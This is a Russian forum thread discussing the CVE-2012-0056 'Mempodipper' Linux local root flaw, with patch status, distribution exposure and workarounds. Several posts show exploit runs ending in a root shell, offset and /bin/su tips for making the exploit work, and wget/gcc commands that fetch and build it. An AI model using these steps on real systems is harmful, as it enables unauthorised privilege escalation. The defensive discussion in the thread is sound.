The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
""
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

""  +/
Сообщение от opennews on 23-Янв-12, 16:00 

URL:
Новость: http://www.opennet.dev/opennews/art.shtml?num=32872

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Найдена очередная local root уязвимость в Linux ядрах 2.6.39..."  +3 +/
Сообщение от birdie on 23-Янв-12, 16:00 
Работает - запускал в виртуалке (фиг знает что там за shell code):

Ядро 3.2.1:

$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2684/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049a44.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a38.
[+] Executing su with shellcode.
# whoami
root

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

181. "Найдена очередная local root уязвимость в Linux ядрах 2.6.39..."  +/
Сообщение от Аноним (??) on 24-Янв-12, 23:44 
> Работает - запускал в виртуалке (фиг знает что там за shell code):

А оно там со _всеми_ исходниками, и прога, и шеллкод.
См http://git.zx2c4.com/CVE-2012-0056/tree/

Субъективно - довольно простой и честный код, не вижу откровенных заподлян в отличие от кислотных сук с крайне мутным кодом и хзчтоделающим шеллкодом.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

3. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от ВКПб on 23-Янв-12, 16:48 
C grsecurity не сработал эксплойт.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

20. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от deadless (ok) on 23-Янв-12, 17:22 
а с SELinux ?
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

41. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от ВКПб on 23-Янв-12, 18:00 
Зависит от обрезанности /proc.
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

4. "В ядре Linux найдена локальная root-уязвимость"  +25 +/
Сообщение от Аноним (??) on 23-Янв-12, 16:48 
Ого, какая продинутая и нетривиальная атака. Целый детектив по обходу затычек и проверок, с epic win-ом в конце. Обнаруживший это - реальный молоток, с мышлением истинного хакера. Там где программист думает "как сделать чтобы работало", хакер думает "а как бы мне сделать чтобы оно нае...лось?!"
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Найдена локальная root-уязвимость в ядрах Linux 2.6.39 и выш..."  –4 +/
Сообщение от abra (ok) on 23-Янв-12, 16:49 
Linux localhost 3.2.0-10-generic #17-Ubuntu SMP Thu Jan 19 19:04:20 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

тоже работает

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

217. "Найдена локальная root-уязвимость в ядрах Linux 2.6.39 и выш..."  +/
Сообщение от XoRe (ok) on 25-Янв-12, 18:52 
> Linux localhost 3.2.0-10-generic #17-Ubuntu SMP Thu Jan 19 19:04:20 UTC 2012 x86_64
> x86_64 x86_64 GNU/Linux
> тоже работает

мы атакуем ваш localhost )

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

6. "В ядре Linux найдена локальная root-уязвимость"  +10 +/
Сообщение от Микро on 23-Янв-12, 16:56 
Порутал 5 машин уже, спасибо.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

49. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Клыкастый2 on 23-Янв-12, 18:27 
> Порутал 5 машин уже, спасибо.

:)))) ай какой нехорооооший....

Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

8. "В ядре Linux найдена локальная root-уязвимость"  –12 +/
Сообщение от Дмитрий (??) on 23-Янв-12, 17:01 
2.6.32-5-686-bigmem SMP i686 Debian Squeeze

user@usercomp:/tmp/1$ ./a.out
...
[+] Seeking to offset 0x8049a29.
[+] Executing su with shellcode.
user@usercomp:/tmp/1$

ЧЯДНТ?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "В ядре Linux найдена локальная root-уязвимость"  +3 +/
Сообщение от Аноним (??) on 23-Янв-12, 17:02 
Написано же - с ядер. 2.6.39
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

11. "В ядре Linux найдена локальная root-уязвимость"  +7 +/
Сообщение от Аноним (??) on 23-Янв-12, 17:02 
> ЧЯДНТ?

Новость не читаешь. Там русским по болотному написано: работает для ядер .39 и новее.

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

12. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arachnid (ok) on 23-Янв-12, 17:03 
номер ядер сравни :)
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

13. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 17:04 
> 2.6.32-5-686-bigmem SMP i686 Debian Squeeze
> ЧЯДНТ?

Перечитайте о каких версиях ядра идёт речь.


Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

14. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от anthonio (ok) on 23-Янв-12, 17:09 
читаешь хреново...
>= 2.6.39
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

15. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от CrOrc email on 23-Янв-12, 17:09 
Сказано: начиная с 2.6.39.
В Debian 2.6.39 только в testing и backports.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

18. "В ядре Linux найдена локальная root-уязвимость"  +19 +/
Сообщение от Lain_13 email on 23-Янв-12, 17:20 
Мне так показалось, что выше не совсем ясно сказали, что дело в версии ядра, а потому я тоже обращу на это внимание.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

75. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от ASM (??) on 23-Янв-12, 19:33 
обратите внимание на версию ядра
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

84. "В ядре Linux найдена локальная root-уязвимость"  +3 +/
Сообщение от phaoost (ok) on 23-Янв-12, 20:41 
да-да, обратите внимание на версию ядра
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

167. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 16:49 
> да-да, обратите внимание на версию ядра

Думаю, нужно всё-таки ядро поновее, .39 там или выше. Обратите внимание на версию ядра.

Ответить | Правка | ^ к родителю #84 | Наверх | Cообщить модератору

116. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 00:25 
Скорее всего, дело в версии вашего ядра.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

119. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 05:30 
Для тугодумов: человек акцентировал внимание на том, что не нужно гнаться за версиями. Нужно сидеть на стабильненьком дебиане, без уязвимостей.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

234. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от taz on 01-Фев-12, 16:29 
ой лол, а сквиз уже не стабилен вдруг? ;)
Ответить | Правка | ^ к родителю #119 | Наверх | Cообщить модератору

218. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от XoRe (ok) on 25-Янв-12, 18:55 
> ЧЯДНТ?

Думаете, в версиях с 2.6.32 по 2.6.39 только цыфырку меняли?
В 2.67.32 вполне может быть дырка, которую уже закрыли в новых версиях.
Дырку от 2.6.39 тоже вполне оперативно закроют.
Сидеть на одной версии можно.
Но что вы будете делать, когда найдут дырку в вашей версии ядра?

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

221. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от RusAlex on 25-Янв-12, 23:38 
дело в том, что в версии .39 была убрана дополнительная проверка, вледствие чего уязвимость и стала возможной.
Ответить | Правка | ^ к родителю #218 | Наверх | Cообщить модератору

225. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от Andrey Mitrofanov on 26-Янв-12, 10:37 
> с 2.6.32
> В 2.67.32 вполне может быть дырка, которую уже закрыли в новых версиях.

Вам привет от Грега КХ и 2.6.32.55.

> Но что вы будете делать, когда найдут дырку в вашей версии ядра?

Про дистрибутивы не слышали? Про обновления безопасности?? Да! Расскажите нам ещё про дИрки!! </tag>

Ответить | Правка | ^ к родителю #218 | Наверх | Cообщить модератору

16. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от ALex_hha (ok) on 23-Янв-12, 17:14 
А RHEL то зачем приплели, там 2.6.32
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

24. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от solardiz (ok) on 23-Янв-12, 17:28 
Там не 2.6.32, а своя ветка, уже давно ушедшая от 2.6.32 на приличное расстояние.

"CVE-2012-0056 affects the Linux kernel as shipped with Red Hat Enterprise Linux 6 from version 2.6.32-220.el6 (RHSA-2011:1530) and later, and Red Hat Enterprise MRG from version 2.6.33.9-rt31.75.el6rt (RHSA-2011:1253) and later. (The kernels shipped with RHSA-2011:1530 and RHSA-2011:1253 included a backport of upstream git commit 198214a7.)"

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

19. "В ядре Linux найдена локальная root-уязвимость"  +6 +/
Сообщение от solardiz (ok) on 23-Янв-12, 17:20 
Проблеме также подвержены свежие ядра из RHEL 6 (новость исправил). Вот анализ от Red Hat:

https://access.redhat.com/kb/docs/DOC-69129
https://bugzilla.redhat.com/show_bug.cgi?id=782642

Там же - workaround с использованием SystemTap. Другой workaround - убрать пользователям доступ ко всем SUID/SGID программам.

К сожалению, исправление в git от 17-го января привносит другую проблему, сравнительно небольшую (обход RLIMIT_NPROC * RLIMIT_AS):

http://www.openwall.com/lists/oss-security/2012/01/22/5

Дискуссия на /r/netsec:

http://www.reddit.com/r/netsec/comments/os8wl/linux_local_pr.../

Более старые ядра именно этой атаке не подвержены, но могут быть подвержены схожим атакам через чтение (а не запись) того же /proc/<pid>/mem. Конкретных атак (attack vectors) пока нет (пока не нашли такой программы и такого способа атаки, чтобы это было проблемой безопасности); в теории, это может быть утечка криптографических ключей, хешей паролей и т.п. Исправление этого обсуждается. В любом случае, это будет другой номер CVE.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

156. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от Аноним (??) on 24-Янв-12, 14:13 
Читать ваши комментарии на опеннете, пожалуй, интереснее всех остальных.
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

22. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от Аноним (??) on 23-Янв-12, 17:25 
> На данный момент ни один из дистрибутивов данную ошибку не закрыл.

Debian stable не повержен насколько я понял.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

42. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от Michael Shigorin email(ok) on 23-Янв-12, 18:10 
>> На данный момент ни один из дистрибутивов данную ошибку не закрыл.

Неправда.

> Debian stable не повержен насколько я понял.

Он и не был подвержен с 2.6.32, очевидно.  А в альте исправили три дня тому в 3.0/3.2:
http://packages.altlinux.org/en/t6/srpms/kernel-image-std-de...
http://packages.altlinux.org/en/t6/srpms/kernel-image-un-def...

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

169. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от vle email(ok) on 24-Янв-12, 17:18 
> А в альте исправили три дня тому в 3.0/3.2:
> http://packages.altlinux.org/en/t6/srpms/kernel-image-std-de...
> http://packages.altlinux.org/en/t6/srpms/kernel-image-un-def...

По поводу ASLR/PIE в качестве защиты.
В ядре 2.6.26 /proc/*/maps выставлен флаг чтения для ВСЕХ.
Более новых ядер у меня нет, чтоб посмотреть.
Проверьте у себя.

JFYI:
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/miscfs/procfs/pr...

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

23. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Андрей (??) on 23-Янв-12, 17:27 
uname -a
Linux big.home.local 3.2.1-gentoo #1 SMP Sat Jan 14 19:21:48 MSK 2012 x86_64 AMD Athlon(tm) II X2 215 Processor AuthenticAMD GNU/Linux

не работает :S

./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/9108/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: ./a.out -o ADDRESS
[-] Example: ./a.out -o 0x402178

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

120. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от anonymous (??) on 24-Янв-12, 05:56 
скопируй в /bin/su любой суидный исполняемый файл, заработает.
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

121. "В ядре Linux найдена локальная root-уязвимость"  +6 +/
Сообщение от arisu (ok) on 24-Янв-12, 05:59 
> скопируй в /bin/su любой суидный исполняемый файл, заработает.

а может, сразу уже пароль рута вести и не мучаться?

Ответить | Правка | ^ к родителю #120 | Наверх | Cообщить модератору

184. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 00:01 
> а может, сразу уже пароль рута вести и не мучаться?

Угадать адрес в su как-то зело проще чем пароль от рута.

Ответить | Правка | ^ к родителю #121 | Наверх | Cообщить модератору

25. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от bircoph (ok) on 23-Янв-12, 17:28 
Разные машины с Gentoo, ядра 2.6.39.3, 3.0.8, 3.1.6.
Ни один из эксплойтов не работает 8-P
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

28. "В ядре Linux найдена локальная root-уязвимость"  +9 +/
Сообщение от Кровавый email on 23-Янв-12, 17:35 
Ну это же Gentoo. Надо было курить маны, потом пересобирать! ;)
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

29. "В ядре Linux найдена локальная root-уязвимость"  +5 +/
Сообщение от sig_wall on 23-Янв-12, 17:35 
в генте /bin/su нечитаем для обычного юзера - надо указывать оффсет вручную. в моей генте подошло -o 0x402100
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

46. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Michael Shigorin email(ok) on 23-Янв-12, 18:18 
> в генте /bin/su нечитаем для обычного юзера - надо указывать оффсет вручную.

В ALT -- обычно тоже, доступных всем suid binaries негусто.

Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

88. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 21:34 
> В ALT -- обычно тоже, доступных всем suid binaries негусто.

А зачем нужен su недоступный пользователю? :))

Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

96. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Michael Shigorin email(ok) on 23-Янв-12, 22:10 
>> В ALT -- обычно тоже, доступных всем suid binaries негусто.
> А зачем нужен su недоступный пользователю? :))

1) для понижения привилегий рутом;
2) если недоступен всем, то это ещё не значит, что недоступен и wheel.

Ответить | Правка | ^ к родителю #88 | Наверх | Cообщить модератору

178. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 23:23 
> 1) для понижения привилегий рутом;

А я почему-то всегда думал что su в основном нужен чтобы разрешить сильно некоторые административные операции выборочно некоторым пользователям, гранулярно, контролируемо и не более чем необходимо. Обувание рута на права - напоминает закручивание гвоздя отверткой. Если права не нужны - зачем тогда рутом логиниться?

> 2) если недоступен всем, то это ещё не значит, что недоступен и wheel.

Наверное прикольно когда права доступа раскиданы по 2 разным местам - участию в группе и самому конфигу суды. Мне такой подход кажется несколько кривым/неудобным.

Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

183. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Michael Shigorin email(ok) on 24-Янв-12, 23:55 
> А я почему-то всегда думал [...]

http://www.opennet.dev/openforum/vsluhforumID3/73378.html#19

> Если права не нужны - зачем тогда рутом логиниться?

Необязательно эти права унаследованы от login(1). :)

>> 2) если недоступен всем, то это ещё не значит, что недоступен и wheel.
> Наверное прикольно когда права доступа раскиданы по 2 разным местам - участию
> в группе и самому конфигу суды.

В конфиг смотрит сама программа, а вот группой можно ограничить доступ на её запуск.

> Мне такой подход кажется несколько кривым/неудобным.

В ALT (и как понимаю -- Owl) это может быть control sudo wheelonly: http://www.altlinux.org/Control

Ответить | Правка | ^ к родителю #178 | Наверх | Cообщить модератору

186. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 00:12 
Упс. Я тормоз и почему-то подумал в этот момент о sudo, на основании чего меня  проглючило. Высказанное насчет правов относилось больше к sudo вообще. В том плане что через него удобно пользователя подбрасывать в правах на немного и для сильно некоторых операций.
Ответить | Правка | ^ к родителю #183 | Наверх | Cообщить модератору

114. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от arisu (ok) on 24-Янв-12, 00:00 
> А зачем нужен su недоступный пользователю? :))

доступность для запуска != доступность для чтения. ваш Кэп.

Ответить | Правка | ^ к родителю #88 | Наверх | Cообщить модератору

152. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 13:32 
зачем читать su?
Ответить | Правка | ^ к родителю #114 | Наверх | Cообщить модератору

179. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 23:29 
> доступность для запуска != доступность для чтения. ваш Кэп.

А, я думал пользователя просто совсем обули на какую либо деятельность с su. А в чем профит запрета чтения файла su при доступности его выполнения? Если в затыкании сплойтов типа этого - так это совсем уж как-то в стиле "windows xp with firewall.jpg" - серьезно настроенный деятель адрес так или иначе добудет. Хотя-бы взяв файл из пакета.

Ответить | Правка | ^ к родителю #114 | Наверх | Cообщить модератору

180. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 24-Янв-12, 23:35 
> А в чем профит запрета чтения файла su при доступности его выполнения?

а зачем обычному юзеру его читать? мало ли, какая там информация, всё-таки suid.

Ответить | Правка | ^ к родителю #179 | Наверх | Cообщить модератору

187. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 00:17 
> а зачем обычному юзеру его читать? мало ли, какая там информация, всё-таки suid.

Собственно, обычный пользователь может его из пакета качнуть, так что если там какая информация - она и так добываема этим пользователем.

Ответить | Правка | ^ к родителю #180 | Наверх | Cообщить модератору

189. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 25-Янв-12, 00:23 
> Собственно, обычный пользователь может его из пакета качнуть

орли? не путаем админа локалхоста и «обычного юзера»?

да, я в курсе, что пакет может добыть из интернетов кто угодно. если человек знает, что это, где это и так далее — это уже не обычный юзер. раз.

два: под словами «обычному юзеру» вполне очевидно подразумевалось «программа с правами обыкновенного лимитированого юзера». если в твоём кругу принято читать распечатки машинного кода на ночь — я рад за тебя. в моём — не принято.

Ответить | Правка | ^ к родителю #187 | Наверх | Cообщить модератору

182. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 23:48 
>> доступность для запуска != доступность для чтения. ваш Кэп.
> А, я думал пользователя просто совсем обули на какую либо деятельность с
> su. А в чем профит запрета чтения файла su при доступности
> его выполнения? Если в затыкании сплойтов типа этого - так это
> совсем уж как-то в стиле "windows xp with firewall.jpg" - серьезно
> настроенный деятель адрес так или иначе добудет. Хотя-бы взяв файл из
> пакета.

Сколько вон дырок находили в glibc. Не удивлюсь, если завтра опять через дыру в дебрях ld.so/ldd можно будет получить рута. Ну, кроме ldd /path/to/crafted/elf.

Ответить | Правка | ^ к родителю #179 | Наверх | Cообщить модератору

77. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Андрей (??) on 23-Янв-12, 19:57 
ну это, наверное, PIC "виноват"?:)
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

170. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от vle email(ok) on 24-Янв-12, 17:21 
> ну это, наверное, PIC "виноват"?:)

ls -la /proc/1/maps; uname -srm
что говорят?

Ответить | Правка | ^ к родителю #77 | Наверх | Cообщить модератору

151. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arsenicum (??) on 24-Янв-12, 12:57 
Сырцы обновили, теперь в указании смещения нет необходимости. 3.1.6-gentoo — работает.
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

157. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 24-Янв-12, 14:22 
что-то не вижу обновлений.
Ответить | Правка | ^ к родителю #151 | Наверх | Cообщить модератору

166. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arsenicum (??) on 24-Янв-12, 16:38 
http://git.zx2c4.com/CVE-2012-0056/
Ответить | Правка | ^ к родителю #157 | Наверх | Cообщить модератору

176. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 24-Янв-12, 21:33 
> http://git.zx2c4.com/CVE-2012-0056/

хм. таки да.

Ответить | Правка | ^ к родителю #166 | Наверх | Cообщить модератору

145. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аркола on 24-Янв-12, 11:29 
Ну ты не так собрал :)
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

26. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от savant (ok) on 23-Янв-12, 17:31 
А для ARM будет работать?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

36. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от EuPhobos (ok) on 23-Янв-12, 17:53 
Будет, но эксплоит нужен соответсвующий..
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

190. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 01:00 
> А для ARM будет работать?

По дефолту не будет. Там в нескольких местах есть:
#else
#error "That platform is not supported."
#endif

Но в принципе и для ARM можно поправить при сильном желании. Нет шеллкода и некоторые архитектурозависимых сущностей.

Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

27. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от FiX лень логиниться on 23-Янв-12, 17:34 
Linux fix-laptop 3.2.1-1-ARCH #1 SMP PREEMPT Fri Jan 13 06:50:31 CET 2012 x86_64 Intel(R) Core(TM) i7-2617M CPU @ 1.50GHz GenuineIntel GNU/Linux

Подозреваю, что уже пофиксено? Тогда в топике дезинформация - Arch не попадает в список.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

30. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от FiX лень логиниться on 23-Янв-12, 17:36 
Хм... пишут, что на 3.2.1 все же работает.
Получается, что дырка до сих пор не исправлена даже в официальном ядре?
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

39. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от solardiz (ok) on 23-Янв-12, 17:57 
> Получается, что дырка до сих пор не исправлена даже в официальном ядре?

Исправлена 17-го числа. 3.2.1 вышел раньше. 3.3-rc1 вышел 19-го и, думаю, уже содержит это исправление.

Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

32. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Anonimous on 23-Янв-12, 17:39 
Тоже ядро, тот же Arch. Не работает: segmentation fault ./mempodipper
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

79. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от анон on 23-Янв-12, 19:59 
> Тоже ядро, тот же Arch. Не работает: segmentation fault ./mempodipper

Как его вообще скомпилить %) ???

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

111. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от emg81 (ok) on 23-Янв-12, 23:55 
$ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
$ gcc mempodipper.c
$

скомпилен файл a.out. разве это сложно? :)

Ответить | Правка | ^ к родителю #79 | Наверх | Cообщить модератору

112. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от дон педро on 23-Янв-12, 23:58 
подтверждаю. в арче не работает.
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

33. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 17:41 
В https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0056 написано:
> Candidate assigned on 20111207

Это страшно.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

37. "В ядре Linux найдена локальная root-уязвимость"  +5 +/
Сообщение от solardiz (ok) on 23-Янв-12, 17:54 
Вовсе не страшно. CNA, включая Red Hat, получают пулы CVE-номеров заранее, еще не под конкретные уязвимости. Как я понимаю, видимая на cve.mitre.org дата - это дата выделения очередного пула в данном случае Red Hat'у.

http://cve.mitre.org/cve/cna.html

А реально этот CVE-номер был присвоен именно этой уязвимости вот где и когда:

http://www.openwall.com/lists/oss-security/2012/01/18/2

т.е. почти сразу после исправления в git и первого постинга в oss-security - собственно, он и был CVE request'ом (в данном случае от одного сотрудника Red Hat другому, но публично - в целях transparency процесса и доступности CVE id сразу и другим distro vendors).

Red Hat здесь сработал отлично. Я не вижу, что они могли сделать лучше.

Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

43. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 18:12 
Снова человеческий фактор легкомыслия. Исправления таких вещей надо публиковать после того как вендоры выпустят обновления (лучше на день или два позже).

Неужели и в наш век в сети можно найти сервис где локальные учетки раздают?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

47. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Клыкастый2 on 23-Янв-12, 18:18 
>  Исправления таких вещей надо публиковать после того как вендоры выпустят обновления

это да, ато вдруг внезапно выяснится, что apt-get-kiddies не в состоянии патч наложить.

> Неужели и в наш век в сети можно найти сервис где локальные учетки раздают?

точно не скажу, но без виртуализации я бы не рискнул. Более тонкий вопрос: внутри одной конторы. Например кроме админа есть товарисчи, имеющие шелл. Они вроде как и свои, но как бы не сильно хотелось, чтобы у них был рут.

Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

91. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 23-Янв-12, 21:38 
> это да, ато вдруг внезапно выяснится, что apt-get-kiddies не в состоянии патч
> наложить.

У аптгетчиков уже апдейт прилетел, приколись? Оперативно работают, ядро прилетает одновременно с новостью :)

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

105. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от Аноним (??) on 23-Янв-12, 23:29 
> У аптгетчиков уже апдейт прилетел, приколись? Оперативно работают, ядро прилетает одновременно
> с новостью :)

У других апгетчиков, нестабильных, апдейт пока прилетать не планирует.

Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

191. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 01:03 
> У других апгетчиков, нестабильных, апдейт пока прилетать не планирует.

В убунтах например прилетело очень быстро, буквально вместе с новостью.

Ответить | Правка | ^ к родителю #105 | Наверх | Cообщить модератору

160. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от Аноним (??) on 24-Янв-12, 15:36 
> У аптгетчиков уже апдейт прилетел, приколись? Оперативно работают, ядро прилетает одновременно с новостью :)

В комплекте с закрытием этой уязвимости - прилетело открытие новой.
В общем, нет покоя аптгетчикам :)

Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

188. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Michael Shigorin email(ok) on 25-Янв-12, 00:23 
> В комплекте с закрытием этой уязвимости - прилетело открытие новой.

(глядя в почту) В упор не наблюдаю.

> В общем, нет покоя аптгетчикам :)

apt-get yaawn :)

Ответить | Правка | ^ к родителю #160 | Наверх | Cообщить модератору

192. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 01:05 
> В комплекте с закрытием этой уязвимости - прилетело открытие новой.

Что за новая уязвимость? Пруф?

> В общем, нет покоя аптгетчикам :)

А остальные чем принципиально лучше/хуже? У них дырки чтоли персональные? :)

Ответить | Правка | ^ к родителю #160 | Наверх | Cообщить модератору

202. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 02:05 
> Что за новая уязвимость? Пруф?

http://www.openwall.com/lists/oss-security/2012/01/22/5

